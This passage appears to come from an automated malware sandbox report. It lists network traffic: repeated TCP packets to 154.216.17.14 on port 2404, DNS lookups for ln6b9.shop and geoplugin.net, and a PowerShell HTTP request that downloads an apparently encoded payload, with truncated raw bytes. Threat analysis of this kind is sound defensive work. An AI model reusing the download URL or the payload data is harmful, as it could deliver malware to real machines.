                                                                                      Oct 10, 2024 09:28:02.926373005 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926383972 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926386118 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.926395893 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926418066 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.926440954 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.926546097 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926556110 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926567078 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926577091 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926615000 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.926615000 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.926666021 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.926687956 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926701069 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926711082 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926721096 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.926748037 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.926760912 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.927011967 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.927022934 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.927033901 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.927038908 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.927048922 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.927088976 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.928272009 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928283930 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928293943 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928304911 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928317070 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928318024 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.928349018 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.928366899 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.928400993 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928412914 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928423882 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928435087 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928445101 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928445101 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.928457022 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928466082 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.928487062 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.928487062 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.929060936 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.930000067 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930011988 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930022955 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930033922 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930046082 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930052996 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.930052996 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.930056095 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930136919 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930146933 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930156946 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930166960 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.930167913 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930166960 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.930177927 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930187941 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:02.930208921 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.930208921 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:02.933568954 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.010548115 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010565042 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010577917 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010615110 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010626078 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010628939 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.010637999 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010649920 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010672092 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.010689020 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.010813951 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010832071 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010843992 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010854006 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010865927 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010890961 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.010907888 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.010919094 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010930061 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010941982 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010945082 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.010952950 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010963917 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.010987043 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.010992050 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011003017 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011013985 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011023998 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011025906 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011066914 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011066914 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011106968 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011117935 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011127949 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011138916 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011149883 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011161089 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011168003 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011168003 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011173010 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011177063 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011214972 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011219978 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011225939 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011235952 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011241913 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011250973 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011269093 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011321068 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011329889 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011343956 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011356115 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011365891 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011377096 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011394978 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011404037 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011404991 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011418104 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011426926 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011437893 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011440992 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011447906 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.011470079 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.011470079 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032326937 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032346964 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032357931 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032368898 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032392025 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032392025 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032445908 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032457113 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032468081 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032490015 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032500982 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032511950 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032511950 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032511950 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032521963 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032533884 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032543898 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032555103 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032555103 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032555103 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032612085 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032716036 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032726049 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032736063 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032747984 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032758951 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032769918 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032769918 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032769918 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032813072 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032819033 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032830954 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.032883883 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.032948971 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033003092 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033015966 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033020973 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033026934 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033031940 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033036947 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033047915 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033055067 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033060074 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033066988 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033098936 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033104897 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033111095 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033117056 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033123016 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033128023 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033154011 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.033189058 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033195019 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033201933 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033256054 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033267021 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033272982 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033277988 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:03.033318043 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.033385038 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:03.033863068 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:06.958724976 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:06.963634968 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.963648081 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.963665009 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.963673115 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.963704109 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:06.963725090 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:06.963726044 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.963748932 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.963809967 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.963818073 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.963838100 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.963845968 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.968550920 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.968569040 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.968614101 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.968622923 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.968683958 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.968693018 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:06.968722105 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:07.003681898 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:07.008805037 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:07.008853912 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:22.354639053 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:22.363168955 CEST499152404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:22.368024111 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:52.462934017 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:52.463992119 CEST499152404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:52.468844891 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:29:22.567559958 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:29:22.568941116 CEST499152404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:29:22.573823929 CEST240449915154.216.17.14192.168.2.6

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 10, 2024 09:27:23.285386086 CEST6173053192.168.2.61.1.1.1
                                                                                      Oct 10, 2024 09:27:23.299973965 CEST53617301.1.1.1192.168.2.6
                                                                                      Oct 10, 2024 09:28:01.167943001 CEST5918153192.168.2.61.1.1.1
                                                                                      Oct 10, 2024 09:28:01.175317049 CEST53591811.1.1.1192.168.2.6

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Oct 10, 2024 09:27:23.285386086 CEST192.168.2.61.1.1.10x4334Standard query (0)ln6b9.shopA (IP address)IN (0x0001)false
                                                                                      Oct 10, 2024 09:28:01.167943001 CEST192.168.2.61.1.1.10x8401Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Oct 10, 2024 09:27:23.299973965 CEST1.1.1.1192.168.2.60x4334No error (0)ln6b9.shop104.21.2.6A (IP address)IN (0x0001)false
                                                                                      Oct 10, 2024 09:27:23.299973965 CEST1.1.1.1192.168.2.60x4334No error (0)ln6b9.shop172.67.128.117A (IP address)IN (0x0001)false
                                                                                      Oct 10, 2024 09:28:01.175317049 CEST1.1.1.1192.168.2.60x8401No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • ln6b9.shop
                                                                                      • geoplugin.net

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.649712104.21.2.680948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 10, 2024 09:27:23.310188055 CEST178OUTGET /IBodHWPw/Kokkerering.ocx HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                      Host: ln6b9.shop
                                                                                      Connection: Keep-Alive
                                                                                      Oct 10, 2024 09:27:23.926213980 CEST1236INHTTP/1.1 200 OK
                                                                                      Date: Thu, 10 Oct 2024 07:27:23 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3ubXfba15N6ot1V5XKOf%2FSPnDhn9bFYkqIkK5r6k3EMaYSJBEVgQL0s7mOB%2FUmLS3BhKg4Sd0UwNIEWjwN8%2FtG%2Bcn2JfpziYVsKvDW3qKm95xZJnJeR%2Buf8yqXZ"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d04e33d39167289-EWR
                                                                                      alt-svc: h2=":443"; ma=60
                                                                                      Data Raw: 33 31 65 61 0d 0a 63 51 47 62 36 77 4b 4a 68 37 75 77 58 42 59 41 36 77 4b 44 49 48 45 42 6d 77 4e 63 4a 41 54 72 41 73 41 39 36 77 4c 38 63 72 6c 2f 67 7a 66 32 36 77 4a 46 36 33 45 42 6d 34 48 78 71 45 37 36 59 2b 73 43 59 6c 54 72 41 6e 74 2b 67 63 45 70 4d 6a 4a 71 36 77 4c 61 38 33 45 42 6d 33 45 42 6d 33 45 42 6d 37 6f 71 34 6c 66 62 63 51 47 62 36 77 4b 69 48 75 73 43 39 75 33 72 41 76 73 77 4d 63 70 78 41 5a 76 72 41 6a 59 33 69 52 51 4c 36 77 4a 35 75 4f 73 43 39 52 76 52 34 75 73 43 65 6a 33 72 41 75 79 51 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6b 51 5a 6b 55 43 66 4d 6e 72 41 68 39 45 36 77 49 67 51 34 74 45 4a 41 54 72 41 67 36 54 63 51 47 62 69 63 4e 78 41 5a 76 72 41 74 54 7a 67 63 4f 43 2b 7a 34 42 36 77 4b 2f 70 58 45 42 6d 37 71 55 4a 59 5a 62 36 77 49 4a 4d 75 73 43 72 2f 6d 42 38 67 68 62 52 44 37 72 41 6d 70 42 36 77 4c 4b 6f 49 48 43 5a 49 45 39 6d 75 73 43 45 44 4e 78 41 5a 74 78 41 5a 74 78 41 5a 74 78 41 5a 76 72 41 76 56 35 69 77 77 51 63 51 47 62 36 77 49 30 46 6f 6b 4d [TRUNCATED]
                                                                                      Data Ascii: 31eacQGb6wKJh7uwXBYA6wKDIHEBmwNcJATrAsA96wL8crl/gzf26wJF63EBm4HxqE76Y+sCYlTrAnt+gcEpMjJq6wLa83EBm3EBm3EBm7oq4lfbcQGb6wKiHusC9u3rAvswMcpxAZvrAjY3iRQL6wJ5uOsC9RvR4usCej3rAuyQg8EEcQGbcQGbgfkQZkUCfMnrAh9E6wIgQ4tEJATrAg6TcQGbicNxAZvrAtTzgcOC+z4B6wK/pXEBm7qUJYZb6wIJMusCr/mB8ghbRD7rAmpB6wLKoIHCZIE9musCEDNxAZtxAZtxAZtxAZvrAvV5iwwQcQGb6wI0FokME+sCGHJxAZtCcQGbcQGbgfog2wQAddbrAhxlcQGbiVwkDOsC4pXrAs38ge0AAwAA6wKg6usCC7+LVCQI6wKdcusCtm+LfCQEcQGbcQGbievrAoDncQGbgcOcAAAAcQGbcQGbU3EBm3EBm2pAcQGbcQGbievrAsTscQGbx4MAAQAAANBeAnEBm3EBm4HDAAEAAOsCzmfrAhs4U3EBm+sCmAuJ63EBm+sCw4aJuwQBAADrAnna6wJ4pYHDBAEAAOsCVDNxAZtT6wKiausCslFq/+sCycxxAZuDwgVxAZvrAtYMMfbrAiqxcQGbMclxAZtxAZuLGu
                                                                                      Oct 10, 2024 09:27:23.926249981 CEST1236INData Raw: 73 43 6f 45 4e 78 41 5a 74 42 36 77 4a 31 73 58 45 42 6d 7a 6b 63 43 6e 58 7a 36 77 4a 38 62 2b 73 43 30 36 70 47 63 51 47 62 36 77 49 4b 75 49 42 38 43 76 75 34 64 64 7a 72 41 75 35 6b 63 51 47 62 69 30 51 4b 2f 4f 73 43 63 32 35 78 41 5a 73 70
                                                                                      Data Ascii: sCoENxAZtB6wJ1sXEBmzkcCnXz6wJ8b+sC06pGcQGb6wIKuIB8Cvu4ddzrAu5kcQGbi0QK/OsCc25xAZsp8HEBm+sCTxH/0usCP/VxAZu6INsEAOsCS+JxAZsxwHEBm3EBm4t8JAxxAZvrAlHVgTQHX9CSh+sCJbRxAZuDwARxAZtxAZs50HXl6wIQPOsCWNWJ+3EBm+sC64H/1+sCjgnrAkm9ozi4h1/Qea/VDRh8eQx3cybsF
                                                                                      Oct 10, 2024 09:27:23.926265955 CEST1236INData Raw: 2f 30 4f 50 67 57 57 39 41 62 41 73 66 51 6b 6f 63 35 33 31 57 33 58 39 43 53 68 31 2f 51 6b 6f 64 66 30 4a 4b 48 58 39 43 53 68 31 2f 51 6b 6f 64 66 30 4a 4c 71 30 6e 4a 54 46 76 66 34 53 33 5a 4d 4a 63 4c 58 35 2f 43 2b 61 4b 62 6c 41 45 6a 64
                                                                                      Data Ascii: /0OPgWW9AbAsfQkoc531W3X9CSh1/Qkodf0JKHX9CSh1/Qkodf0JLq0nJTFvf4S3ZMJcLX5/C+aKblAEjdlL9PF8Exss71vLFacNAKjFmqd8vSozHnrM4Rb2gGgbQyPtDMScmYwMgiMDedcuRbC1PfUNGErV/Qkodf0JKHX9CSh1/Qkodf0JKHX9CS+AUz67bh60P027Yikpw9DxGm/6wo0yBEScdZL81d0JI4Al2D0Qxrz7wdn
                                                                                      Oct 10, 2024 09:27:23.926290035 CEST1236INData Raw: 58 52 59 66 54 37 6d 4a 37 36 63 70 59 4d 32 67 65 2b 71 4a 36 79 70 5a 56 6c 54 45 73 45 76 2f 38 49 56 43 58 69 78 6d 77 56 44 59 52 66 69 78 4f 72 65 77 74 61 69 51 56 52 76 71 4e 68 33 61 71 50 74 39 55 36 67 31 39 5a 46 36 39 65 30 4a 4c 68
                                                                                      Data Ascii: XRYfT7mJ76cpYM2ge+qJ6ypZVlTEsEv/8IVCXixmwVDYRfixOrewtaiQVRvqNh3aqPt9U6g19ZF69e0JLhUBehh1/Qkodf0JKHX9CSh1/Qkodf0JKHX9D+dssdglsYISLGyN+SWYfQkodf0JKHX9CSh1/Qkodf0JKHX9CShz/htl2kUGTRQL+79xCDGgwSzF7mHu3Uk3uGv0ntts3TDoBJhu+AXzw7hjaI6Kl1mDRg62F2McIzM
                                                                                      Oct 10, 2024 09:27:23.926309109 CEST1236INData Raw: 43 53 68 31 2f 51 6b 6f 64 66 76 70 32 7a 72 45 67 79 74 70 77 30 2b 72 37 69 34 54 51 4f 30 69 6d 54 68 31 38 63 6f 41 43 39 62 45 6e 54 58 68 46 4b 4a 66 33 74 34 64 57 31 77 54 6b 34 67 4c 71 72 6b 73 6f 2b 61 4e 49 77 79 69 2b 55 62 51 63 70
